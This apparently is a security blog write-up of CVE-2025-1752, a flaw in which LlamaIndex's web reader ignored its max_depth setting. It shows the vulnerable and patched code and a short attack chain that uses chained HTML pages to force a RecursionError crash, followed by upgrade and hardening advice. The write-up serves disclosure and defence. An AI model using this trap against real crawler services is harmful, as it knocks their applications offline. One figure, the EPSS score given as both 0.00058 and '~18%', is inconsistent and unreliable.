Infinite Loops and Broken Dreams: Crashing LlamaIndex with a Single Link
Jan 11, 2026·5 min read
Executive Summary (TL;DR)
LlamaIndex's web reader failed to enforce its own `max_depth` parameter. An attacker can supply a URL pointing to a malicious site with circular links (A -> B -> A), causing the crawler to enter an infinite loop. This triggers a `RecursionError` and crashes the application, resulting in a Denial of Service. Fixed in `llama-index-readers-web` version 0.3.6.
A classic logic error in LlamaIndex's KnowledgeBaseWebReader allows attackers to crash Python processes via uncontrolled recursion. By ignoring its own safety parameters, the library wanders endlessly into deep or circular web directories until the stack explodes.
The Hook: When AI Crawlers Get Lost
LlamaIndex is the darling of the RAG (Retrieval-Augmented Generation) world, acting as the connective tissue between your messy data and your shiny LLM. One of its key features is the KnowledgeBaseWebReader, a tool designed to scrape documentation and knowledge bases so your AI actually knows what it's talking about.
The premise is simple: you give it a root_url, and it crawls the site to build an index. It's supposed to be smart. It's supposed to handle modern web complexities. But in this case, it was a little too eager.
Imagine sending a robot into a library to count books, but the library is a fantastical labyrinth where hallways loop back on themselves. Without a map or a step counter, the robot just keeps walking until its batteries die. That is exactly what happens here. A malicious actor can feed the reader a URL that leads down a rabbit hole with no bottom, crashing the underlying Python process and taking your AI service offline.
The Flaw: A Speed Limit Sign with No Police
The vulnerability is tracked as CWE-674: Uncontrolled Recursion. In computer science 101, we learn that every recursive function needs a 'base case'—a condition that tells it to stop calling itself. Without it, you get a stack overflow (or in Python's case, a RecursionError).
The irony of CVE-2025-1752 is that the developers knew they needed a limit. The function signature for get_article_urls proudly displayed a max_depth parameter, defaulting to 100. It looked safe. It felt safe.
But here's the punchline: the code never actually checked that parameter. It was like putting up a "Speed Limit 55" sign but firing all the police officers. The variable was accepted, passed around, and completely ignored. The crawler would blindly follow links A -> B -> C -> ... -> Infinity, oblivious to the fact that it was supposed to stop 99 hops ago.
The Code: The Smoking Gun
Let's look at the diff. It's painfully simple, which makes it all the more tragic. In the vulnerable version, the recursion logic fired away without tracking how deep it was currently operating.
Vulnerable Code (Simplified):
# The max_depth is right there! But it does nothing!
def get_article_urls(self, browser, root_url, current_url, max_depth=100):
# ... scraping logic ...
for link in links:
# We just keep going, passing the same ignored max_depth
self.get_article_urls(browser, root_url, link, max_depth)The fix involved actually implementing the logic implied by the parameter. They introduced a depth counter that increments with every recursive dive.
Fixed Code (Commit 3c65db2947):
def get_article_urls(
self, browser, root_url, current_url, max_depth=100, depth=0
):
# The Base Case we were promised
if depth >= max_depth:
print(f"Reached max depth ({max_depth}): {current_url}")
return []
# ... scraping logic ...
for link in links:
# Pass depth + 1 to the next victim
self.get_article_urls(browser, root_url, link, max_depth, depth + 1)[!NOTE] Even with this fix, there is a secondary concern. The code opens a new Playwright browser page (
browser.new_page()) at the start of the function and closes it at the end. In a recursion of depth 100, you might have 100 browser tabs open simultaneously in the stack before the first one closes. While the infinite recursion is fixed, memory exhaustion is still a very real risk for deep crawls.
The Exploit: Ouroboros
Exploiting this is trivial. You don't need shellcode; you just need a web server and a sense of humor. The goal is to trigger Python's default recursion limit (usually 1000).
The Attack Chain:
- Setup: Host a malicious web page.
- The Trap: Create two pages that link to each other, or a single page that links to itself with a query parameter to make the URL look unique (to bypass simple deduping, though this reader didn't seem to have that either).
<!-- index.html -->
<a href="/page/1">Click me</a>
<!-- /page/1 -->
<a href="/page/2">Next</a>
<!-- /page/2 -->
<a href="/page/3">Next</a>
...- The Trigger: Feed your malicious URL to an application using LlamaIndex.
- The Crash: The
KnowledgeBaseWebReadersees a link, follows it, sees another link, follows it. Sincemax_depthis ignored, it passes the 100 mark, passes the 200 mark, and eventually hits the Python interpreter's hard limit.
The application throws RecursionError: maximum recursion depth exceeded and the worker process dies immediately. If this worker handles a queue of jobs, the queue stalls. If it's a synchronous API, the server returns a 500 error.
The Fix: Stopping the Bleeding
The remediation is straightforward: update your dependencies. The vendor patched this in llama-index-readers-web version 0.3.6.
However, developers relying on web crawling should always be paranoid. Relying on a library's internal depth limit is good, but you should also:
- Enforce Global Timeouts: Don't let a crawl job run forever.
- Resource Limits: Run your crawlers in isolated containers with strict memory limits so a crash doesn't take down the main application.
- Sanitize Inputs: Don't let users point your crawler at arbitrary IP addresses or untrusted domains.
# Check your version
pip show llama-index-readers-web
# Update immediately
pip install --upgrade llama-index-readers-webOfficial Patches
Fix Analysis (1)
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:HAffected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
llama-index-readers-web LlamaIndex | < 0.3.6 | 0.3.6 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-674 (Uncontrolled Recursion) |
| CVSS v3.1 | 7.5 (High) |
| Attack Vector | Network |
| Impact | Availability (DoS) |
| EPSS Score | 0.00058 (~18%) |
| Affected Versions | < 0.3.6 |
MITRE ATT&CK Mapping
The software does not properly control the amount of recursion that can occur, consuming excessive resources, such as memory or the program stack.
Known Exploits & Detection
Vulnerability Timeline
Subscribe to updates
Get the latest CVE analysis reports delivered to your inbox.